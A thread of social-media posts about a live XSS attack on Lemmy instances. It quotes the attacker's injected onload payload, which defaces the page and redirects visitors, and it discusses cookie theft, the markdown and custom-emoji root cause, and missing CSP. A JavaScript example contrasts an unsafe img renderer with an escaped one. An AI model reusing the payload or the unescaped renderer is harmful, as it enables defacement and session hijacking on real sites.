Wow, I open my #Lemmy feed and the first thing I see is a new #XSS exploit in the markdown parser. That’s not good… I’m glad I’m strictly using third party clients.

https://sh.itjust.works/post/923025

#Security

(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field - sh.itjust.works

# DO NOT OPEN THE “LEGAL” PAGE — lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar. It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

[https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png]

EDIT: the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

[https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png]
[https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png]

EDIT 2: The legal information field also has that exploit, so that when you go to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")

The JS is being inserted inline via images. Why didn’t Lemmy restrict this in the CSP in the first place?

The attacker took their time to obfuscate the code…

Image credit: AlmightySnoo @ sh.itjust.works

Cookies are being stolen through this vulnerability (unsurprisingly), aka session hijacking. Seeing as Lemmy uses JWTs, I really hope they maintain the ability to invalidate sessions. Otherwise, accounts will be stolen and there’s almost nothing people will be able to do about it after the fact.

The #markdown logic from this file (https://github.com/LemmyNet/lemmy-ui/blob/main/src/shared/markdown.ts) is used in the sidebar and other components. The popular markdown library “markdown-it” is being used as the backbone.

The dangerouslySetInnerHTML prop is being set to true, which overrides #React’s built-in security protections. It looks like the #Lemmy team got unlucky with an insecure library.

Update: The markdown parser was not the root of the issue. Instead, it was the custom emoji logic.
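An added illustration of the attribute-injection pattern in the quoted payload (example code, not lemmy-ui's or markdown-it's own): a hand-built `<img>` renderer that splices the markdown image title into the tag verbatim, beside one that escapes every attribute value. The title string is constructed in the same shape as the payload above, not copied from it; markdown-it's default renderer already escapes attribute values, which is why a bypass like this only appears in custom tag-building code.

```javascript
// Added example (not Lemmy's code). A markdown image ![alt](src "title")
// becomes an <img> tag. If the title is interpolated without attribute
// escaping, a title containing `" onload="...` closes the title attribute
// and smuggles in an event-handler attribute. Escaping the HTML-significant
// characters in every attribute value keeps the title inert text.

// Constructed input mimicking the shape of the thread's payload (not the real one).
const CONSTRUCTED_TITLE = 'lw" onload="document.body.innerHTML=`seized`';

// Escape the characters that can break out of a double-quoted attribute value.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable renderer: attribute values are spliced in verbatim.
function renderImgUnsafe({ src, alt, title }) {
  return `<img src="${src}" alt="${alt}" title="${title}">`;
}

// Hardened renderer: every attribute value goes through escapeAttr.
// (A scheme allow-list for src is a separate, additional check not shown here.)
function renderImgSafe({ src, alt, title }) {
  return `<img src="${escapeAttr(src)}" alt="${escapeAttr(alt)}" title="${escapeAttr(title)}">`;
}

// Lists the attribute names present in a single rendered tag. In the unsafe
// output the injected quote splits "title" into two attributes.
function attributeNames(html) {
  const names = [];
  for (const m of html.matchAll(/\s([a-zA-Z-]+)="([^"]*)"/g)) names.push(m[1]);
  return names;
}

// Review check: a tag rendered from markdown must never carry an on* handler.
function hasEventHandlerAttr(html) {
  return attributeNames(html).some((name) => /^on/i.test(name));
}

const sample = { src: 'https://example.invalid/img.png', alt: '', title: CONSTRUCTED_TITLE };
console.log(renderImgUnsafe(sample)); // carries an onload attribute
console.log(renderImgSafe(sample));   // title is one escaped attribute value
```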

Possible XSS attack · Issue #1895 · LemmyNet/lemmy-ui

@httpjames Apparently they did at first, but it somehow got reintroduced in 2022, and just didn't get attention after that at all: https://github.com/LemmyNet/lemmy-ui/issues/83
Remove inline Javascript · Issue #83 · LemmyNet/lemmy-ui

This is the main thing Mozilla Observatory complains about regarding our Content Security Policy. https://observatory.mozilla.org/analyze/enterprise.lemmy.ml